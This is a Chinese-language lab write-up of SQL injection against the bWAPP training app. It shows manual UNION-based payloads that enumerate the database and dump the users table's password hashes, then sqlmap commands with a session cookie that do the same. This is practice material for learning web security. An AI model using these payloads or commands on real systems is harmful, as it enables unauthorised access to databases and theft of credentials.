(一)手工注入
1、判断注入点及注入类型
在搜索框中随便输入a,可以查询到标题带有a的全部电影信息,输入b查询出不同的数据,说明title是一个可变参数,这也是存在sql注入的必备条件之一。
为了验证猜想,在页面正常查询的情况下,在title参数后加单引号’,页面出现报错
根据提示的报错信息,还需要闭合%
猜测后台数据库查询语句可能为 select * from table where title like ‘%’. $name . ‘%’;
接下来进行语句闭合之后,进一步验证:
title=a%’ and 1=1%23 页面正常
title=a%’ and 1=2%23 页面异常或报错
至此,基本确定了注入的存在,参数title存在注入,注入类型为字符型注入。
2、判断字段数
title=a%’ order by 8%23 页面报错
title=a%’ order by 7%23 页面正常
可以判断出字段数为7。
3、利用联合查询确定回显位置
title=-a%’ union select 1,2,3,4,5,6,7%23
确定回显位置为2,3,4,5。
4、查询当前数据库,当前用户,版本等信息
title=-a%’ union select 1,database(),user(),4,version(),6,7%23
数据库:bwapp
用户:root@localhost
版本:5.5.53
5、查询指定数据库中的表
title=-a%’ union select 1,2,table_name,4,version(),6,7 from information_schema.tables where table_schema=database()%23
得到很多表名,一般用户名密码会存放在users表中,下面直接爆这张表的数据。
6、查询users表中的列名
title=-a%’ union select 1,2,group_concat(column_name),4,version(),6,7 from information_schema.columns where table_schema=database() and table_name=‘users’%23
得到users表中的所有列名。
7、查询users表中的数据
title=-a%’ union select 1,id,login,password,5,6,7 from users%23
可以得到两个注册的用户名和对应的密码,密码采用了sha1加密,可用在线网站解密之后得到明文密码为:bug。
(二)自动化注入
工具:sqlmap
1、注入点测试
按照常规方式进行注入点的测试时,出现报错信息:在login.php界面时出现状态码302,没有cookie信息,未能成功登录,需要获取cookie。
使用burpsuite工具在登陆界面后进行抓包,获取cookie信息,得到PHPSESSID。
在sqlmap加上cookie信息,进行注入点的确定,爆出数据库信息:
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” -dbs
2、查询当前数据库
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” -current-db
得到当前数据库为bwapp。
3、查询bwapp数据库下的表名
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --tables -D bwapp
得到bwapp数据库下的表有:blog、heroes、movies、users、visitors。
4、查询users表下的列名
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --columns -D bwapp -T users
得到users表中的所有字段名。
5、查询users表中的相关数据
sqlmap -u “http://192.168.150.138/bwapp/sqli_1.php?title=a&action=search” --cookie “security level=0;PHPSESSID=15dtet5j88angqejr6t4msh5i5” --dump -T users
成功获取到users表中的数据,注册用户名和密码,电子邮箱等信息。
!!!注意点
很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器通常是通过cookie确认用户身份。sqlmap进行检测时,默认是不带cookie的,发出去的请求会被服务器拒之门外。这时,我们需要带上cookie才能进行sql注入检测。
本次自动化注入如果不加上cookie的话,是没有办法出现注入结果的,问就是失败了几次的经验之谈/(ㄒoㄒ)/~~
到这里,就成功采用两种方式对目标靶场进行了注入操作,yep!